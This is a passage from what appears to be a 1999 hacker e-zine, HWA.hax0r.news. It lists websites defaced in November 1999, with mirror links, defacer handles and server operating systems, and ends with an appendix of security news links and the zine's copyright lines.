www.click2u.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.click2u.com Defaced by: ytcracker Operating System: Windows NT (WebSitePro/2.4.5) Date 11/6/99 Defaced domain: www.fintrac.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.fintrac.com Defaced by: coderz Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: acc02.acc1.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/acc02.acc1.edu Defaced by: Verb0 Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.utaced.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.utaced.edu Defaced by: Verb0 Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.salton-maxim.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.salton-maxim.com Defaced by: ne0h Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: 209.247.153.200 Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/209.247.153.200 Defaced by: nawk Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.keimyung.ac.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.keimyung.ac.kr Defaced by: project x Operating System: Solaris 2.x (Apache 1.3.3) Date 11/6/99 Defaced domain: www.peoplesupport.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.peoplesupport.com Defaced by: MetalTung Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: dmla.clan.lib.nv.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/dmla.clan.lib.nv.us Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.spa.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.spa.gov.my Defaced by: OySTr n KLaM Operating System: Solaris 2.5x (Apache 1.3.3) Date 11/6/99 Defaced domain: sex-offender.vsp.state.va.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/sex-offender.vsp.state.va.us Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.state.co.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.state.co.us Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.ci.arlington.tx.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.ci.arlington.tx.us Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: police.ci.berkeley.ca.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/police.ci.berkeley.ca.us Defaced by: hV2k Operating System: Windows NT (IIS/4.) Date 11/6/99 Defaced domain: www.brasemb.or.jp Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.brasemb.or.jp Defaced by: JLM Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: infobase.ic.gc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/infobase.ic.gc.ca Defaced by: ch4x Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.hoehne.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.hoehne.com Defaced by: xhostile Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.cegep-heritage.qc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.cegep-heritage.qc.ca Defaced by: ch4x Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.t75warez.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.t75warez.com Defaced by: globher Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.3.6) Date 11/7/99 Defaced domain: ameribusiness.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ameribusiness.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: chilewebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chilewebdirectory.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: atlaslink.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/atlaslink.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: directorioantofagasta.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directorioantofagasta.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: ajokeaday.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ajokeaday.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: appraise-now.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/appraise-now.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: chistes.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chistes.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: directorioconcepcion.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directorioconcepcion.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: arachnidbait.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/arachnidbait.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: ayudante.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ayudante.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: earlywarningalarms.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/earlywarningalarms.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: filmmakersworldwide.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/filmmakersworldwide.com Defaced by: acid k|own Operating System: echo "internetsecurity.com" >> filmmakersworldwide.com Date 11/7/99 Defaced domain: chicago911.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chicago911.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: crghrz.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/crghrz.com Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: herdaddy.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/herdaddy.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: directoriovalparaiso.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directoriovalparaiso.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: ecuadorwebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ecuadorwebdirectory.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: icuss.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/icuss.net Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: laventaja.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/laventaja.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: justmfg.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/justmfg.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: noidos.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/noidos.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: mexicowebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/mexicowebdirectory.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: atlantisinc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/atlantisinc.com Defaced by: Narcissus Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: pay-per-search.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/pay-per-search.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.tatincom.ru Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tatincom.ru Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: protectionelectronics.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/protectionelectronics.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: publicistasweb.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/publicistasweb.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: robertward.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/robertward.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: santiagowebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/santiagowebdirectory.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: conto.ru Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/conto.ru Defaced by: ytcracker Operating System: NMAP says FreeBSD, Server says IIS/4.0 Date 11/7/99 Defaced domain: webpeopleschoice.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/webpeopleschoice.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: textadvertising.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/textadvertising.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.ariel.muni.il Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ariel.muni.il Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: quitowebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/quitowebdirectory.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: tecktron.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/tecktron.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: surplus2000.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/surplus2000.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.tatincom.ru Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tatincom.ru Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.mastic.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.mastic.gov.my Defaced by: JxLxMx Operating System: Windows NT Date 11/7/99 Defaced domain: www.tce.se.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tce.se.gov.br Defaced by: NFO Insecure Team Date 11/7/99 Defaced domain: www.sghms.ac.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.sghms.ac.uk Defaced by: tefx Operating System: Solaris Date 11/7/99 Defaced domain: www.ccsiinc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ccsiinc.com Defaced by: ph33r the b33r Operating System: Digital Unix Date 11/7/99 Defaced domain: www.lths.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.lths.org Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.reiseblitz.de Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.reiseblitz.de Defaced by: z0z Operating System: Solaris Date 11/7/99 Defaced domain: www.clubx.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.clubx.com Defaced by: twd Operating System: BSDI Date 11/7/99 Defaced domain: www.ak-prepared.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ak-prepared.com Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.opic.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.opic.gov Defaced by: hV2k Operating System: Windows NT Date 11/7/99 Defaced domain: www.stlib.state.nm.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.stlib.state.nm.us Defaced by: hV2k Operating System: Windows NT Date 11/7/99 Defaced domain: www.usis.com.ba Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.usis.com.ba Defaced by: Pakastan Hackerz Club Operating System: Windows 95 Date 11/7/99 Defaced domain: monitoring2.er.usgs.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/monitoring2.er.usgs.gov Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.dongac.ac.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.dongac.ac.kr Defaced by: TREATY Operating System: Linux Date 11/7/99 Defaced domain: txdps.state.tx.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/txdps.state.tx.us Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.trentonlibrary.state.nj.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.trentonlibrary.state.nj.us Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]